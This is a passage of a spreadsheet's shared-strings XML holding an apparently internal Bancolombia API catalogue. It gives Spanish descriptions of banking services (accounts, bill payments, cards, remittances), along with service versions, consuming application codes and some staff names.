  <si>
    <t>Bank Account - Accounts Opening</t>
  </si>
  <si>
    <t>bank-account-accounts-opening</t>
  </si>
  <si>
    <t>Permite realizar la apertura de cuentas de ahorro o corriente para clientes ya vinculados con el Banco.</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Bank Account - Plan Changing</t>
  </si>
  <si>
    <t>bank-account-plan-changing</t>
  </si>
  <si>
    <t>Cambia el plan de una cuenta de ahorros, de acuerdo con la oferta comercial de planes de vigentes.</t>
  </si>
  <si>
    <t>CambioPlanCuenta/V1.0</t>
  </si>
  <si>
    <t>Bill Payment</t>
  </si>
  <si>
    <t>Bill Payment - Management</t>
  </si>
  <si>
    <t>bill-payment-management</t>
  </si>
  <si>
    <t>El API Bill Payments - Management permitirá realizar gestión sobre sus facturas, podrá consultar las facturas, inscribirlas y/o actualizarlas.</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MonitoreoDCM_NU0084001_Recaudos</t>
  </si>
  <si>
    <t>Bill Payment - Scheduled Information</t>
  </si>
  <si>
    <t>bill-payment-scheduled-information</t>
  </si>
  <si>
    <t>La API Bill Payment - Scheduled Information permite consultar información sobre la programación de los pagos</t>
  </si>
  <si>
    <t>ConsultaPagoProgramado/V1.0</t>
  </si>
  <si>
    <t>Bill Payment - Schedules</t>
  </si>
  <si>
    <t>bill-payment-schedules</t>
  </si>
  <si>
    <t>El API Bill Payment - Schedule le permitirá al consumidor gestionar la programación del pago de sus facturas. Podrá crear, eliminar y actualizar la programación del pago de sus facturas</t>
  </si>
  <si>
    <t>Bill Payments - Information Payer</t>
  </si>
  <si>
    <t>bill-payment-information-payer</t>
  </si>
  <si>
    <t>El API Bill Payments - Information Payer permitirá a los usuarios obtener información sobre los pagos de facturas realizados, en canales virtuales. La información podrá ser consultada en un rango de tiempo de máximo tres meses a partir del níºmero de identificación del pagador, adicional tendrá otras opciones para filtrar la consulta que facilitarán su proceso de bíºsqueda.</t>
  </si>
  <si>
    <t>Bill Payments Execution</t>
  </si>
  <si>
    <t>Bill Payments Execution - Payments</t>
  </si>
  <si>
    <t>bill-paymenst-execution-payments</t>
  </si>
  <si>
    <t xml:space="preserve">La API permitirá a los consumidores realizar el pago de  Facturas previamente inscritas, deben estár asociadas a un convenio de recaudo. El pago podrá realizarse con debito a cuenta y efectivo. </t>
  </si>
  <si>
    <t>PagoFacturaConConvenio/V1.0</t>
  </si>
  <si>
    <t>Bill Payments Order</t>
  </si>
  <si>
    <t>Bill Payments Order - Bills</t>
  </si>
  <si>
    <t>bill-payment-order-bills</t>
  </si>
  <si>
    <t>La API Bill Payments Order - Bills Permitirá a los consumidores realizar la consulta y eliminación de las facturas inscritas que tiene un cliente en particular, adicionalmente se podrá consultar el detalle de una factura programada para pagos automáticos mensuales.</t>
  </si>
  <si>
    <t>ALM_AW0955001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 ALM_AW0955 _x000D_
 app1 _x000D_
 AppAuditoriaApisEjemplo</t>
  </si>
  <si>
    <t>Biller</t>
  </si>
  <si>
    <t>Biller - Management</t>
  </si>
  <si>
    <t>biller-management</t>
  </si>
  <si>
    <t>El API Biller - Management permitirá a los recaudadores hacer gestión sobre sus facturas.</t>
  </si>
  <si>
    <t>AnulacionFacturaRecaudo/V1.0</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000D_
 HabitatAdministraciones_NU0113001 _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000D_
 MonitoreoDCM_NU0084001_Recaudos _x000D_
 APIC_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Biller - Transactions</t>
  </si>
  <si>
    <t>biller-transactions</t>
  </si>
  <si>
    <t>El API Biller - Transactions permitirá consultar los movimientos de un convenio de recaudo, los datos son consultados a partir del tipo y níºmero de identificación del recaudador, estos datos deberán obtenerse en la api Collection Agreements - Information retrieveDetailAgreement, de manera opcional podrá consultar los movimientos a partir del codigo del convenio, la cuenta recaudadora, la forma de pago, el canal y el estado.</t>
  </si>
  <si>
    <t>Biller Files</t>
  </si>
  <si>
    <t>Biller Files - Files Sent</t>
  </si>
  <si>
    <t>biller-files-files-sent</t>
  </si>
  <si>
    <t>La API permite listar los archivos que el core de recaudos le ha enviado al recaudador, estos pueden contener información sobre los recaudos que fueron captadas (consolidado o tiempo real) o novedades</t>
  </si>
  <si>
    <t>ConsultaArchivosEnviadosRecaudador/V1.0</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR_PDN _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 APIC_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Biller Files - Information</t>
  </si>
  <si>
    <t>biller-files-information</t>
  </si>
  <si>
    <t>Esta Api permite consultar la información de los archivos que son enviados por el recaudador, se tienen tres tipos de archivos, facturas, cobros y novedades. Se tienen dos operaciones que permitiran obtener información resumida de los archivos y luego obtener el detalle de la información de uno de ellos.</t>
  </si>
  <si>
    <t>ConsultaArchivoRecaudos/V1.0</t>
  </si>
  <si>
    <t>Biller Files - Management</t>
  </si>
  <si>
    <t>biller-files-management</t>
  </si>
  <si>
    <t>El API Biller File - Management permite gestionar los archivos del recaudador, como su anulación</t>
  </si>
  <si>
    <t>GestionArchivoRecaudo/V1.0</t>
  </si>
  <si>
    <t>Bloquear Desbloquear Usuario</t>
  </si>
  <si>
    <t>Permitir Bloquear ó Desbloquear el usuario de una persona natural para que no pueda utilizar el canal de las filiales Panamá/Cayman, Miami.</t>
  </si>
  <si>
    <t>Bloquear Primera Segunda Clave SVP</t>
  </si>
  <si>
    <t>Permitie Bloquear la primera o segunda clave a través de la sucursal virtual personas, ya sea por intentos de acceso errados o por solicitud del cliente para las filiales Panamá/Cayman, Miami</t>
  </si>
  <si>
    <t>BM_SVE_Acceder Acuerdo Trade</t>
  </si>
  <si>
    <t>La funcionalidad de consulta le permite a un cliente realizar la solicitud de consultas de un producto Trade desde la Sucursal Virtual Empresas (SVE) hacia FINACLE.</t>
  </si>
  <si>
    <t>AW0360</t>
  </si>
  <si>
    <t>Commercial Information</t>
  </si>
  <si>
    <t>Branch Commercial Team</t>
  </si>
  <si>
    <t>branch-commercial-team</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de obtener la información de los códigos CIF y CRM del equipo comercial de una sucursal, es decir su gerente, los asesores o vendedores y la identificación o código de la sucursal.</t>
  </si>
  <si>
    <t>VisorInteractivo_AW1249001</t>
  </si>
  <si>
    <t>Business Opportunities</t>
  </si>
  <si>
    <t>Business Opportunities - Consolidated</t>
  </si>
  <si>
    <t>business-opportunities-consolidated</t>
  </si>
  <si>
    <t>A través de esta operación se puede obtener todo el consolidado de oportunidades comerciales asignadas a un cliente.</t>
  </si>
  <si>
    <t>Oportunidades comerciales (STOC)</t>
  </si>
  <si>
    <t>Natalia Andrea Rodas</t>
  </si>
  <si>
    <t>VisorInteractivo_AW1249001 _x000D_
 CGC_NU0014001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 BNPL_NU0287001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Business Opportunities Sme</t>
  </si>
  <si>
    <t>Business Opportunities - SME Generals Inquiry</t>
  </si>
  <si>
    <t>business-opportunities-sme-generals-inquiry</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales del segmento personas y Pyme a la carta, que resultan de los modelos analí­ticos del banco y que se entregan a la LZ.</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 VisorInteractivo_AW1249001 _x000D_
 LimitsCreditExhibition_NU0114001</t>
  </si>
  <si>
    <t>Business Opportunities - SME Management</t>
  </si>
  <si>
    <t>business-opportunities-sme-management</t>
  </si>
  <si>
    <t>La API tiene la gestion de las oportunidades comerciales pyme.</t>
  </si>
  <si>
    <t>Business Opportunities - SME PreApproved Inquiry</t>
  </si>
  <si>
    <t>business-opportunities-sme-preapproved-inquiry</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales de pre- aprobados de los clientes del segmento pyme, para pymes con estados financieros y preaprobados para pymes sin estados financieros, la api proporciona un método para cada grupo.</t>
  </si>
  <si>
    <t>Business Opportunities MasterData</t>
  </si>
  <si>
    <t>business-opportunities-masterdata</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de obtener la informacion general de los catalogos.</t>
  </si>
  <si>
    <t>Business Opportunities Person</t>
  </si>
  <si>
    <t>Business Opportunities Persons - Generals</t>
  </si>
  <si>
    <t>business-opportunities-persons-generals</t>
  </si>
  <si>
    <t>La API permite consultar las oportunidades comerciales del segmento personas, de un cliente en particular.</t>
  </si>
  <si>
    <t>HabitatCore_AW1281003 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 VisorInteractivo_AW1249001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 LoansOffer_NU0102001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 EASYHOME_NU0004001 _x000D_
 SUFIOriginacion_AW1097001 _x000D_
 salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>Business Opportunities Persons - Management</t>
  </si>
  <si>
    <t>business-opportunities-persons-management</t>
  </si>
  <si>
    <t>La API tiene la gestion de las oportunidades comerciales personas.</t>
  </si>
  <si>
    <t>Business Opportunities Persons-Preapproved</t>
  </si>
  <si>
    <t>business-opportunities-persons-preapproved</t>
  </si>
  <si>
    <t>La API permite consultar los pre-aprobados del segmento personas, de un cliente en particular.</t>
  </si>
  <si>
    <t>Button</t>
  </si>
  <si>
    <t>Button - Account</t>
  </si>
  <si>
    <t>button-account</t>
  </si>
  <si>
    <t>El api Button Account permite consultar las cuentas de un cliente que cumplan con las codiciones para pagar por medio del producto Botón Bancolombia.</t>
  </si>
  <si>
    <t>Debito y Prepago</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 One Click Payment_NU0199001</t>
  </si>
  <si>
    <t>Button - Information</t>
  </si>
  <si>
    <t>button-information</t>
  </si>
  <si>
    <t>Esta api permite llevar a cabo las siguientes funcionalidades de consulta relacionadas con el servicio Botón Bancolombia.   - Consultar vinculación comercio/cliente, Permite listar los comercios vinculados a Botón - Consultar botones cliente, Permite listar los botones de todos los comercios asociados a un cliente, así­ como filtrar los botones generados por comercio, rango de fechas de creación, estado del botón (Activo, Inactivo, Retirado). - Consultar Detalle del Comercio, Capacidad que permite mostrar el detalle de los comercios vinculados a Botón. - Consultar Detalle de un Botón, Capacidad que permite mostrar el detalle de un botón.</t>
  </si>
  <si>
    <t>Button - Management</t>
  </si>
  <si>
    <t>button-management</t>
  </si>
  <si>
    <t>## **Button - Management** El api Button - Management permite realizar diferentes operaciones relacionadas con el botón Bancolombia: **1. Crear Botón:** Permite la creación de un botón al servicio de Botón Bancolombia   **2. Modificar Información de Botón:** Esta operación permite actualizar la información de un botón generado por un comercio vinculado en Botón Bancolombia. La información que se puede modificar es la siguiente:   - Fecha de vencimiento del botón.   - Referencia.   - Nombre.   - Descripción.   - Valor por unidad.   - Cantidad de productos.   **3. Estado de Boton:** Permite cambiar el estado de uno o varios botones generados por un comercio vinculado a Botón Bancolombia. Los estados se pueden cambiar entre  - ACTIVO  - INACTIVO  - RETIRADO       Para realizar el cambio de estado, la bíºsqueda se puede realizar por botón, identificador íºnico de comercio, o datos de identificación del comercio guardados en la vinculación al producto Botón Bancolombia (tipo y níºmero de documento). Si la bíºsqueda se realiza por tipo y níºmero de documento o identificador íºnico del comercio, el cambio de estado de botón aplicará a todos los botones asociados al comercio.</t>
  </si>
  <si>
    <t>Button - Onboarding</t>
  </si>
  <si>
    <t>button-onboarding</t>
  </si>
  <si>
    <t>## **Button - Onboarding**  Permite llevar a cabo las siguientes funcionalidades relacionadas con el servicio Botón Bancolombia: **1. Vinculación del Comercio:** Permite realizar la vinculación de un comercio realizando la inscripción al servicio Botón Bancolombia para habilitar su Uso.   **2. Modificar Vinculación comercio:** Permite Modificar la información de vinculación en el servicio de Botón Bancolombia.    **3. Cambio de estado:** Permite realizar un cambio de estado de un comercio relacionado a la vinculación en Botón Bancolombia.</t>
  </si>
  <si>
    <t>Button - Technical Setting</t>
  </si>
  <si>
    <t>button-technical-setting</t>
  </si>
  <si>
    <t>Esta api permite llevar a cabo las siguientes funcionalidades relacionadas con el servicio Botón Bancolombia   - Registro de Información Técnica del reporte: Permite  Almacenar la Información  Técnica  del reporte  parametrización para configuración la  transmisión de archivos   (Sterling). - Registro de Información Técnica del CallBack: Permite realizar el registro de información del comercio con las Llaves privadas para Credenciales CallBack. - Modificar la Información Técnica del reporte: Permite realizar la modificación de la de información del reporte.   - Modificar la información técnica del CallBack: Permite realizar la modificación de las credenciales del CallBack.</t>
  </si>
  <si>
    <t>Calcular Operacion Divisas</t>
  </si>
  <si>
    <t>El servicio Calcular Operación Divisas se encargará de realizar validación de la operación, previo a completar la operación de divisas el sistema expondrá al usuario la información del a negociación que está realizando a través de este servicio.
El servicio cuenta con las operaciones de calculo de compra y calculo de venta de divisas.</t>
  </si>
  <si>
    <t>Comercio Exterior</t>
  </si>
  <si>
    <t>DEVELOPSOATEST _x000D_
PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Calculo Cuota Credito</t>
  </si>
  <si>
    <t>Capacidad que permiten el cálculo de cuota para créditos no desembolsados y de recálculo para créditos desembolsados.</t>
  </si>
  <si>
    <t>DEVELOPSOATEST _x000D_
PRODUCTORCONSUMIDOR _x000D_
NU0102001</t>
  </si>
  <si>
    <t>Cambiar Clave SVE</t>
  </si>
  <si>
    <t>Permitir generar las claves de los usuarios que interactúan en la Empresa con el producto a través de la Sucursal Virtual, mejorando el servicio cliente en forma segura.</t>
  </si>
  <si>
    <t>Cambiar Primera Segunda Clave SVP</t>
  </si>
  <si>
    <t>Permitir que un cliente de Filiales del Exterior (Panamá/Cayman, Miami), pueda cambiar su Primera ó Segunda Clave desde la Sucursal Virtual Personas.</t>
  </si>
  <si>
    <t>Cambio Plan Cuenta</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Cambio Plan Cuentas permite cambiar el plan de una cuenta de ahorros o corriente, desde y hacia planes que no tengan restricción como origen y destino.
</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Cancelar Canal SVE</t>
  </si>
  <si>
    <t>Permitir Cancelar el canal (SVE) Sucursal Virtual Empresa al cliente.</t>
  </si>
  <si>
    <t>Cards</t>
  </si>
  <si>
    <t>Card - Credit information</t>
  </si>
  <si>
    <t>credit-card-infomation</t>
  </si>
  <si>
    <t>Permite consultar información de una tarjeta de crédito como:  listar las tarjetas de crédito que tiene  un usuario con información básica de  contacto,  y permite consular los movimientos de una tarjeta especí­fica.</t>
  </si>
  <si>
    <t>Tarjetas</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 App inversionesGB_AW1185001 _x000D_
 APOLO_AW0360010</t>
  </si>
  <si>
    <t>Conoce a profundiad el detalle de información del proximo pago de tu cliente.</t>
  </si>
  <si>
    <t>Aceptación</t>
  </si>
  <si>
    <t>Alfredo Alonso Parra Laverde</t>
  </si>
  <si>
    <t>ConsultaInformacionTarjetaCredito/V1.1</t>
  </si>
  <si>
    <t>TMP SOPORTE APP_lgcorrg</t>
  </si>
  <si>
    <t>Card - Credit Payment Information</t>
  </si>
  <si>
    <t>card-credit-payment-information</t>
  </si>
  <si>
    <t>Esta API permite consultar la información de pago de las tarjetas de crédito</t>
  </si>
  <si>
    <t>ConsultaInformacionTarjetaCredito/V1.0</t>
  </si>
  <si>
    <t>Card - Credit Payments</t>
  </si>
  <si>
    <t>card-credit-payments</t>
  </si>
  <si>
    <t>Permite realizar el pago de una tarjeta de crédito</t>
  </si>
  <si>
    <t>GestionPagoTarjetaCredito/V1.0</t>
  </si>
  <si>
    <t>Card - Credit Transactions</t>
  </si>
  <si>
    <t>card-credit-transactions</t>
  </si>
  <si>
    <t>Retorna el listado de transacciones realizadas por medio de una tarjeta.</t>
  </si>
  <si>
    <t>ConsultaMovimientosTarjetaCredito/V1.0</t>
  </si>
  <si>
    <t>Card - Customer Cards</t>
  </si>
  <si>
    <t>card-customer-cards</t>
  </si>
  <si>
    <t>Te ayudamos a conocer todas las tarjetas que tu cliente posee</t>
  </si>
  <si>
    <t>Card Payment Execution</t>
  </si>
  <si>
    <t>Card Payment Execution - Credit Cards</t>
  </si>
  <si>
    <t>card-payment-execution-credit-cards</t>
  </si>
  <si>
    <t>Esta Api contiene capacidades que permiten realizar diferentes afectaciones monetarias sobre una tarjeta de crédito. Tales afectaciones incluyen: - Pagar tarjeta de crédito con débito a cuenta - Pagar tarjeta de crédito de terceros - Pagar tarjeta de crédito con cuentas de otros bancos</t>
  </si>
  <si>
    <t>AfectacionesMonetariasTarjetasCredito/V1.0</t>
  </si>
  <si>
    <t>ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 PagoTDCWompi_AW1405001</t>
  </si>
  <si>
    <t>Cards - Credit Card Obligations</t>
  </si>
  <si>
    <t>cards-credit-card-obligations</t>
  </si>
  <si>
    <t>La API permite a los consumidores listar las tarjetas del cliente que cuentan con obligaciones, usando el tipo y níºmero de documento como datos de entrada. Se define que un cliente tiene una obligación cuando presenta algíºn valor en la deuda total, ya sea en pesos y dólares</t>
  </si>
  <si>
    <t>ConsultaTarjetasPYME/V1.0
ConsultaTarjetasCredito/V1.0</t>
  </si>
  <si>
    <t>TDC_Macros para tarjetas_AW0485001</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Cards - Debit Cards</t>
  </si>
  <si>
    <t>cards-debit-cards</t>
  </si>
  <si>
    <t xml:space="preserve">La API permite a los consumidores gestionar novedades sobre las tarjetas débito Maestro o Masterdebit. </t>
  </si>
  <si>
    <t>Tarjetas Débito</t>
  </si>
  <si>
    <t>Soledad Morales Llano</t>
  </si>
  <si>
    <t>GestionTarjetasDebito/V1.0</t>
  </si>
  <si>
    <t>Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001</t>
  </si>
  <si>
    <t>Carga De Archivos</t>
  </si>
  <si>
    <t>El servicio tiene la funcionalidad de permitirá realizar la carga de los archivos (ejemplo: Novedades, Cobro y Facturación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio.</t>
  </si>
  <si>
    <t>Recaudos, Pagos o Gobierno e Impuestos</t>
  </si>
  <si>
    <t>Finacle Ent._Recaudos - Colombia_AW1065001</t>
  </si>
  <si>
    <t>GDE _x000D_
PSE _x000D_
SVE</t>
  </si>
  <si>
    <t>Case Root Cause Analysis</t>
  </si>
  <si>
    <t>Case Root Cause Analysis - Tipology Manager</t>
  </si>
  <si>
    <t>case-root-cause-analysis-tipology-manager</t>
  </si>
  <si>
    <t>Este servicio permite identificar la causa de la necesidad de un cliente, a través del análisis y la  Administración de tipologí­as, subtipologias, causalidades, sub causalidades, asociadas a un catálogo de productos, servicios y/o canales previamente identificados. permitiendo identificar el nivel de atención para dar solución a las solicitudes de un Cliente.</t>
  </si>
  <si>
    <t>Esteban Arroyave Montoya</t>
  </si>
  <si>
    <t>Portal Contenidos Bancolombia_AW1218001</t>
  </si>
  <si>
    <t>Channels</t>
  </si>
  <si>
    <t>Channel - Service Points</t>
  </si>
  <si>
    <t>channel-service-points</t>
  </si>
  <si>
    <t>El API de puntos de servicios permite realizar la consulta de los siguientes puntos de servicios del banco: Sucursales, Cajeros, corresponsales Bancarios. Esta consulta se realiza de acuerdo a la posición geográfica (Latitud y longitud).</t>
  </si>
  <si>
    <t>CANALES_TRADICIONALES</t>
  </si>
  <si>
    <t>Servicios Switch y Telefonica</t>
  </si>
  <si>
    <t>GeorreferenciacionAPI</t>
  </si>
  <si>
    <t>Vinculación Digital _x000D_
 CHATBOT _x000D_
 Dummy _x000D_
 BC Portal de Contenido_AW1218001</t>
  </si>
  <si>
    <t>Channel Activity Analysis</t>
  </si>
  <si>
    <t>Channel Activity Analysis - SimCard</t>
  </si>
  <si>
    <t>channel-activity-analysis-simcard</t>
  </si>
  <si>
    <t>Servicio que permite realizar la consulta de la íºltima reexpedición de una simcard, por medio del níºmero celular asociado. Servicio configurado para los operadores Movistar y Claro.</t>
  </si>
  <si>
    <t>GestionSimCard/V1.0</t>
  </si>
  <si>
    <t>PortalAutogestionPyme_AW1287</t>
  </si>
  <si>
    <t>Channel Commission</t>
  </si>
  <si>
    <t>Channel Commission - Customer Transactions</t>
  </si>
  <si>
    <t>channel-commission-customer-transactions</t>
  </si>
  <si>
    <t>Permite la consulta de las comisiones que se cobran en los canales digitales banco en base a la transacción que el cliente realiza desde un canal, a la que se asigna un código especifico parametrizado desde ITC como por ejemplo:  - Transferencia a otro banco  - Transferencias de fondos  - Transferencia a cuenta Nequi</t>
  </si>
  <si>
    <t>Canales Digitales Personas</t>
  </si>
  <si>
    <t>MascaraTransaccional_NU0021001 _x000D_
 ALM_AW0955001 _x000D_
 msitccheckcost_NU0215001</t>
  </si>
  <si>
    <t>Channel Management</t>
  </si>
  <si>
    <t>Administración Mensajes transversales
Gestion Parámetros Tipos de Documento y Marcas de Cuenta</t>
  </si>
  <si>
    <t>Transf_y_Soporte_Distribución_Digital</t>
  </si>
  <si>
    <t>Distribucion Digital</t>
  </si>
  <si>
    <t>Channel Transaction Validations</t>
  </si>
  <si>
    <t>Microservicio encargado de administrar los Canales y Transacciones del D2B y sus respectivos estados, permite encender y apagar Canales y Transacciones en tiempo real.</t>
  </si>
  <si>
    <t>AW1204001</t>
  </si>
  <si>
    <t>Collections Agreement</t>
  </si>
  <si>
    <t>Collection Agreements - Account Collection</t>
  </si>
  <si>
    <t>collection-agreements-account-collection</t>
  </si>
  <si>
    <t>El API Collection Agreement - Collection Account permite consultar información de la cuenta del recaudo</t>
  </si>
  <si>
    <t>ConsultaCuentaRecaudo/V1.0</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN _x000D_
 APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 APIC_AW1176 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MonitoreoDCM_NU0084001_Recaudos _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 Horus_AW1258011</t>
  </si>
  <si>
    <t>Collection Agreements - Information</t>
  </si>
  <si>
    <t>collection-agreements-information</t>
  </si>
  <si>
    <t>El API Collection Agreement permitirá listar y validar la información detallada de los convenios de recaudos. Está operación es vital para el funcionamiento de recaudos, por que contienen los parametros que determina su comportamiento y sus condiciones</t>
  </si>
  <si>
    <t>ConsultaConvenioRecaudo/V1.0</t>
  </si>
  <si>
    <t>Comprar Divisas</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio permite registrar en el sistema de Tesorería del banco una negociación de divisas realizada entre el banco y el cliente. </t>
  </si>
  <si>
    <t>MUREX_MUREX-CORE_AW0434001</t>
  </si>
  <si>
    <t>Confirmar Identidad Persona En Data Credito</t>
  </si>
  <si>
    <t>Este servicio permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras. El proveedor del servicio es quien valida y aprueba las preguntas.</t>
  </si>
  <si>
    <t>Riesgos</t>
  </si>
  <si>
    <t>Servicios Riesgos_NA_AW1086001</t>
  </si>
  <si>
    <t>AW0748001 _x000D_
AW1312001 _x000D_
NU0034001 _x000D_
AW1281003</t>
  </si>
  <si>
    <t>Permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras.</t>
  </si>
  <si>
    <t>AW1097001 _x000D_
AW0939 _x000D_
NU0034001 _x000D_
AW1281003</t>
  </si>
  <si>
    <t>Consignments</t>
  </si>
  <si>
    <t>Consignment - Modify Remittance</t>
  </si>
  <si>
    <t>consignment-modify-remittance</t>
  </si>
  <si>
    <t>API que permite modificar una remesa enviada.</t>
  </si>
  <si>
    <t>Financiación y Consumo</t>
  </si>
  <si>
    <t>GestionRemesas/V1.0</t>
  </si>
  <si>
    <t>CIB_ISCIB0001</t>
  </si>
  <si>
    <t>APP_AAA _x000D_
 TransferWise_TNW _x000D_
 MonitoreoDCM_AAA _x000D_
 Remitly_RTY _x000D_
 Uniteller_UTL _x000D_
 OmnexGroup_UNO _x000D_
 More_MOR _x000D_
 WorldRemit_WRT _x000D_
 RiaFinancialServices_RIA _x000D_
 SmallWorld_OMX _x000D_
 Moneygram_MNR</t>
  </si>
  <si>
    <t>Consignments - Authorization</t>
  </si>
  <si>
    <t>consignments-authorization</t>
  </si>
  <si>
    <t>Proveedor de OAuth2 para autenticación</t>
  </si>
  <si>
    <t>ConsultaRemesas/V1.0</t>
  </si>
  <si>
    <t>Consignments - Cancel Remittance</t>
  </si>
  <si>
    <t>consignment-cancel-remittance</t>
  </si>
  <si>
    <t>API que permite la cancelación de una remesa.</t>
  </si>
  <si>
    <t>Consignments - Consult Remittance</t>
  </si>
  <si>
    <t>consignments-consult-remittance</t>
  </si>
  <si>
    <t>API que permite consultar el estado de la remesa.</t>
  </si>
  <si>
    <t>Consignments - Exchange Rates Query</t>
  </si>
  <si>
    <t>consignments-exchange-rates-query</t>
  </si>
  <si>
    <t>API para consultar las tasas de cambio de USD a COP pactadas entre el banco y la remesadora en fechas determinadas</t>
  </si>
  <si>
    <t>Consignments - Send Remittance</t>
  </si>
  <si>
    <t>consignments-send-remittance</t>
  </si>
  <si>
    <t>API que permite enviar remesas.</t>
  </si>
  <si>
    <t>Consignments - Validate Automatic Credit</t>
  </si>
  <si>
    <t>consignments-validate-automatic-credit</t>
  </si>
  <si>
    <t>Esta API valida si la cuenta de depósito de un cliente Bancolombia permite el abono automático.</t>
  </si>
  <si>
    <t>Consulta Archivo Recaudos</t>
  </si>
  <si>
    <t>Consultar la información a detalle de un archivo, es necesario usar primero la capacidad listar archivos y obtener toda la información necesaria para obtener el detalle. La información podrá ser buscada con diferentes filtros asociados al pagador, la factura o detalles del archivo</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0084001 _x000D_
AW1258011</t>
  </si>
  <si>
    <t>Consulta Archivos Enviados Recaudador</t>
  </si>
  <si>
    <t>Consulta Banco</t>
  </si>
  <si>
    <t xml:space="preserve">
El servicio permite consultar desde las filiares del exterior (Bancolombia Panamá, sucursal Panamá, Bancolombia puerto rico y Bancolombia cayman) los bancos del exterior que se encuentran asociados a estas. 
</t>
  </si>
  <si>
    <t>Finacle - F.E_Panama_AW0709001</t>
  </si>
  <si>
    <t>AW1185001</t>
  </si>
  <si>
    <t>Consulta Caracteristicas Plan Cuenta</t>
  </si>
  <si>
    <t xml:space="preserve">El Servicio ConsultaCaracteristicasPlanCuenta  habilita las capacidades que permite consultar las características del plan de una cuenta de ahorros o corriente. </t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0091001 _x000D_
NU0170001 _x000D_
AW1177001</t>
  </si>
  <si>
    <t>Consulta Catalogo Maestros</t>
  </si>
  <si>
    <t>El servicio Consulta Catalogo Maestros, permite consultar los catálogos de valores de los distintos atributos de los datos de información de cliente. Conteniendo la llave-valor, de los códigos y descripciones de los maestros del banco.  (Ejemplo: Cargos, Profesiones del cliente, entre otros).</t>
  </si>
  <si>
    <t>INFORMACION</t>
  </si>
  <si>
    <t>MDM</t>
  </si>
  <si>
    <t>Claudia Marcela Arias Orozco</t>
  </si>
  <si>
    <t>AW1074001 _x000D_
NU0038001 _x000D_
NU0051001 _x000D_
AW1249001</t>
  </si>
  <si>
    <t>Consulta Catalogo Servicios Depositos</t>
  </si>
  <si>
    <t>Permite consultar el catálogo de servicios disponibles en Depósitos para procesar transacciones de forma masiva o por lotes.</t>
  </si>
  <si>
    <t>Consulta Catalogos Depositos</t>
  </si>
  <si>
